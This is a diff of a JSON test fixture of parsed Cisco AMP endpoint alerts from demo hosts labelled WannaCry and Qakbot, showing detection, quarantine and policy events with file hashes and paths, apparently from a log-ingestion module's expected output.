@@ -1621,24 +1887,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 751000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419303569945526000, + "event.id": 6419303574240494000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 44698, + "log.offset": 40152, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1654,7 +1920,7 @@ ] }, { - "@timestamp": "2021-01-14T19:29:10.000Z", + "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1665,10 +1931,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558979", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -1676,24 +1940,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 751000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419303569945526000, + "event.id": 6419303574240494000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 45884, + "log.offset": 41272, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1709,7 +1973,7 @@ ] }, { - "@timestamp": "2021-01-14T19:29:10.000Z", + "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -1720,10 +1984,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558978", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -1731,24 +1993,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 751000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419303569945526000, + "event.id": 6419303574240494000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 47070, + "log.offset": 42392, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -1775,8 +2037,10 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558981", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1785,7 +2049,7 @@ "53:74:31:cb:37:50" ], "cisco.amp.timestamp_nanoseconds": 782000000, - "event.action": "Threat Quarantined", + "event.action": "Quarantine Failure", "event.category": [ "malware" ], @@ -1799,7 +2063,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 51525, + "log.offset": 43512, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -1828,8 +2092,10 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419303565650558977", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1838,7 +2104,7 @@ "53:74:31:cb:37:50" ], "cisco.amp.timestamp_nanoseconds": 751000000, - "event.action": "Threat Quarantined", + "event.action": "Quarantine Failure", "event.category": [ "malware" ], @@ -1852,7 +2118,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 52645, + "log.offset": 44698, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], 
@@ -1870,38 +2136,49 @@ ] }, { - "@timestamp": "2021-01-14T19:10:32.000Z", + "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648130, + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" ], - "cisco.amp.timestamp_nanoseconds": 199000000, - "event.action": "Policy Update", "event.dataset": "cisco.amp", - "event.id": 6412662859016176000, + "event.id": 6419303569945526000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 65285, + "log.offset": 45884, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], "related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", 
@@ -1914,38 +2191,49 @@ ] }, { - "@timestamp": "2021-01-14T19:10:31.000Z", + "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648130, + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" ], - "cisco.amp.timestamp_nanoseconds": 856000000, - "event.action": "Policy Update", "event.dataset": "cisco.amp", - "event.id": 6412662854721208000, + "event.id": 6419303569945526000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 66208, + "log.offset": 47070, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], "related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", 
@@ -1958,49 +2246,2038 @@ ] }, { - "@timestamp": "2021-01-14T19:10:30.000Z", + "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6412662850426241035", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.2CA2D550E6-100.SBX.VIOC", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 580000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "8495400f199ac77853c53b5a3f278f3e", + "file.hash.sha1": "be5d6279874da315e3080b06083757aad9b32c23", + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.name": "taskse.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 48256, + "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + 
"process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "8495400f199ac77853c53b5a3f278f3e", + "be5d6279874da315e3080b06083757aad9b32c23" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.4A468603FD.04426d77.auto.Talos", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 564000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "4fef5e34143e646dbf9907c4374276f5", + "file.hash.sha1": "47a9ad4125b6bd7c55e4e7da251e23f089407b8f", + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.name": "taskdl.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": 
"windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49887, + "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "4fef5e34143e646dbf9907c4374276f5", + "47a9ad4125b6bd7c55e4e7da251e23f089407b8f" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51525, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 52645, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", 
+ "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 783000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558982", + 
"cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 727000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56507, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 7144, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 721000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 58030, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 7144, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": 
"10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 59553, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + 
"cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 504000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303565650559000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 60814, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + 